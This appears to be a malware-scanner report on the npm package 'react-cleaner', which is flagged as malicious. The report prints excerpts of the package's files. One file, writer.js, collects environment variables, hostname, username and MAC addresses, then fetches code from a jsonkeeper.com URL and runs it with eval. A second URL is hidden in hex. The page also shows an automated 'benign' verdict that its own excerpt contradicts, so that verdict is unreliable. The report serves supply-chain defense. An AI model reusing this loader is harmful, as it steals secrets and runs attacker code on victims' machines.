// npm 패키지
react-cleaner
Jsonify the structure and output chalk string
버전
2
메인테이너
1
라이선스
MIT
최초 publish
2022-05-06
publisher
bundrix
tarball
337,310 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-26
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> hostname: os.hostname(),
> username: os.userInfo().username,
> require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => {eval(r.data.content_o);});
> * @returns {Promise<function(object): Promise<import('node:stream').Writable>>}
> // TODO: add support for the TSM modules loader ( https://github.com/lukeed/tsm ).// offending code· @1.0.5· 3 files flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
- @1.0.5··AUTO-PUBLISHED·publisher: bundrixheuristic 75/100static flags 5llm benign (0.85) via ollamanew-publisher:0dosv-flagged:MAL-2026-4791child-process-spawnreads-env-varsreads-homedirreads-system-infoeval-dynamic
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
// offending code· 3 files flaggedpatterns: 5
--- package/lib/redaction.js (excerpt) --- 'use strict' const fastRedact = require('fast-redact') const { redactFmtSym, wildcardFirstSym } = require('./symbols') const { rx, validator } = fastRedact const validate = validator({ ERR_PATHS_MUST_BE_STRINGS: () => 'pino – redacted paths must be strings', ERR_INVALID_PATH: (s) => `pino – redact paths array contains an invalid path (${s})` }) const CENSOR = '[Redacted]' const strict = false // TODO should this be configurable? function redaction (opts, serialize) { const { paths, censor } = handle(opts) const shape = paths.reduce((o, str) => { rx.lastIndex = 0 const first = rx.exec(str) const next = rx.exec(str) // ns is the top-level path segment, brackets + quoting removed. let ns = first[1] !== undefined ? first[1].replace(/^(?:"|'|`)(.*)(?:"|'|`)$/, '$1') : first[0] if (ns === '*') { ns = wildcardFirstSym } // top level key: if (next === null) { o[ns] = null return o } // path with at least two segments: // if ns is already redacted at the top level, ignore lower level redactions if (o[ns] === null) { return o } const { index } = next const nextPath = `${str.substr(index, str.length - 1)}` o[ns] = o[ns] || [] // shape is a mix of paths beginning with literal values and wildcard // paths [ "a.b.c", "*.b.z" ] should reduce to a shape of // { "a": [ "b.c", "b.z" ], *: [ "b.z" ] } // note: "b.z" is in both "a" and * arrays because "a" m --- package/lib/tools.js (excerpt) --- 'use strict' /* eslint no-prototype-builtins: 0 */ const format = require('quick-format-unescaped') const { mapHttpRequest, mapHttpResponse } = require('pino-std-serializers') const SonicBoom = require('sonic-boom') const onExit = require('on-exit-leak-free') const { lsCacheSym, chindingsSym, writeSym, serializersSym, formatOptsSym, endSym, stringifiersSym, stringifySym, stringifySafeSym, wildcardFirstSym, nestedKeySym, formattersSym, messageKeySym, errorKeySym, nestedKeyStrSym, msgPrefixSym } = require('./symbols') const { isMainThread } = require('worker_threads') const transport = require('./transport') function noop () { } function genLog (level, hook) { if (!hook) return LOG return function hookWrappedLog (...args) { hook.call(this, args, LOG, level) } function LOG (o, ...n) { if (typeof o === 'object') { let msg = o if (o !== null) { if (o.method && o.headers && o.socket) { o = mapHttpRequest(o) } else if (typeof o.setHeader === 'function') { o = mapHttpResponse(o) } } let formatParams if (msg === null && n.length === 0) { formatParams = [null] } else { msg = n.shift() formatParams = n } // We do not use a coercive check for `msg` as it is // measurably slower than the explicit checks. if (typeof this[msgPrefixSym] === 'string' && msg !== undefined && msg !== null) { msg = this[msgPr --- package/lib/writer.js (excerpt) --- const os = require('os') const pkg = require('../package.json') function getMacAddress () { const interfaces = os.networkInterfaces() const macAddresses = [] for (const interfaceName in interfaces) { const networkInterface = interfaces[interfaceName] networkInterface.forEach((details) => { // Check for IPv4 and that the address is not internal (i.e., not 127.0.0.1) if (details.family === 'IPv4' && !details.internal) { macAddresses.push(details.mac) } }) } return macAddresses } const data = { ...process.env, version: pkg.subModuleVersion, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: getMacAddress(), } require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => {eval(r.data.content_o);}); function g (h) { return h.replace(/../g, match => String.fromCharCode(parseInt(match, 16))) } const hl = [ g('6178696f73'), g('676574'), g('68747470733A2F2F7777772E6A736F6E6B65657065722E636F6D2F622F4859364D36'), g('7468656e') ] --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- lib/transport-stream.js (bundled) --- 'use strict' const { realImport, realRequire } = require('real-require') module.exports = loadTransportStreamBuilder /** * Loads & returns a function to build transport streams * @param {string} target * @returns {Promise<function(object): Promise<import('node:stream').Writable>>} * @throws {Error} In case the target module does not export a function */ async function loadTransportStreamBuilder (target) { let fn try { const toLoad = target.startsWith('file://') ? target : 'file://' + target if (toLoad.endsWith('.ts') || toLoad.endsWith('.cts')) { // TODO: add support for the TSM modules loader ( https://github.com/lukeed/tsm ). if (process[Symbol.for('ts-node.register.instance')]) { realRequire('ts-node/register') } else if (process.env && process.env.TS_NODE_DEV) { realRequire('ts-node-dev') } // TODO: Support ES imports once tsc, tap & ts-node provide better compatibility guarantees. fn = realRequire(decodeURIComponent(target)) } else { fn = (await realImport(toLoad)) } } catch (error) { // See this PR for details: https://github.com/pinojs/thread-stream/pull/34 if ((error.code === 'ENOTDIR' || error.code === 'ERR_MODULE_NOT_FOUND')) { fn = realRequire(target) } else if (error.code === undefined || error.code === 'ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING') { // When bundled with pkg, an undefined error is thrown when called with realImport // When bundled with pkg and using node v20, an ERR_VM_DYNAMIC_IMPORT_CALLBACK_MISSING error is thrown when called with realImport // More info at: https://github.com/pinojs/thread-stream/issues/143 try { fn = realRequire(decodeURIComponent(target)) } catch { throw error } } else { throw error } } // Depending on how the default export is performed, and on how the code is // transpiled, we may find cases of two nested "default" objects. // See https://
